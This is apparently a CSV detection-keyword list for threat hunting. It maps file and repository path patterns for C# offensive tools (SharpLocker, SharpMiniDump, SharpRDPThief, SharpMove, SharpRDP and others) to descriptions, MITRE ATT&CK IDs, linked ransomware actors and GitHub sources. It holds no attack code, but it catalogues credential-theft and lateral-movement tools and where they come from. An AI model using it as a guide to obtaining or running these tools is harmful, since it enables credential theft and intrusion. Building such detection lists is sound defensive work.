"*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11017"
"*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11018"
"*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11019"
"*/SharpLDAP.git*",".{0,1000}\/SharpLDAP\.git.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","11020"
"*/SharpLocker.exe*",".{0,1000}\/SharpLocker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11021"
"*/SharpLocker.exe*",".{0,1000}\/SharpLocker\.exe.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11022"
"*/SharpLocker.git*",".{0,1000}\/SharpLocker\.git.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11023"
"*/SharpLocker/releases/*",".{0,1000}\/SharpLocker\/releases\/.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11024"
"*/SharpLocker/zipball/*",".{0,1000}\/SharpLocker\/zipball\/.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11025"
"*/SharpLogger.exe*",".{0,1000}\/SharpLogger\.exe.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","1","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","11026"
"*/Sharpmad.exe*",".{0,1000}\/Sharpmad\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11027"
"*/Sharpmad.exe*",".{0,1000}\/Sharpmad\.exe.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11028"
"*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11029"
"*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11030"
"*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","11031"
"*/SharpMapExec.git*",".{0,1000}\/SharpMapExec\.git.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","11032"
"*/SharpMiniDump.exe*",".{0,1000}\/SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11033"
"*/SharpMiniDump.exe*",".{0,1000}\/SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11034"
"*/SharpMiniDump.git*",".{0,1000}\/SharpMiniDump\.git.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","1","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","11035"
"*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11036"
"*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11037"
"*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11038"
"*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11039"
"*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","1","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","11040"
"*/SharpMove.git*",".{0,1000}\/SharpMove\.git.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","1","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","11041"
"*/SharpNamedPipePTH.exe*",".{0,1000}\/SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11042"
"*/SharpNamedPipePTH.exe*",".{0,1000}\/SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11043"
"*/SharpNBTScan.git*",".{0,1000}\/SharpNBTScan\.git.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","1","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","11044"
"*/SharpNetCheck.exe*",".{0,1000}\/SharpNetCheck\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11045"
"*/SharpNoPSExec*",".{0,1000}\/SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","11046"
"*/SharpNoPSExec.exe*",".{0,1000}\/SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11047"
"*/SharpNoPSExec.exe*",".{0,1000}\/SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11048"
"*/SharpOXID-Find.exe*",".{0,1000}\/SharpOXID\-Find\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11049"
"*/SharpOxidResolver.git*",".{0,1000}\/SharpOxidResolver\.git.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","11050"
"*/SharpOxidResolver/releases/download/*",".{0,1000}\/SharpOxidResolver\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","11051"
"*/SharpPack.git*",".{0,1000}\/SharpPack\.git.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","11052"
"*/SharpPersistSD.dll*",".{0,1000}\/SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","11053"
"*/SharpPersistSD.git*",".{0,1000}\/SharpPersistSD\.git.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","11054"
"*/sharppick.exe*",".{0,1000}\/sharppick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","11055"
"*/SharpPrinter.exe*",".{0,1000}\/SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11056"
"*/SharpPrinter.exe*",".{0,1000}\/SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11057"
"*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11058"
"*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11059"
"*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11060"
"*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11061"
"*/SharpRDP.git*",".{0,1000}\/SharpRDP\.git.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","11062"
"*/SharpRDPHijack*",".{0,1000}\/SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","11063"
"*/SharpRDPThief.git*",".{0,1000}\/SharpRDPThief\.git.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","11064"
"*/SharpReg.exe*",".{0,1000}\/SharpReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11065"
"*/SharpReg.exe*",".{0,1000}\/SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11066"
"*/SharpRoast.exe*",".{0,1000}\/SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","11067"
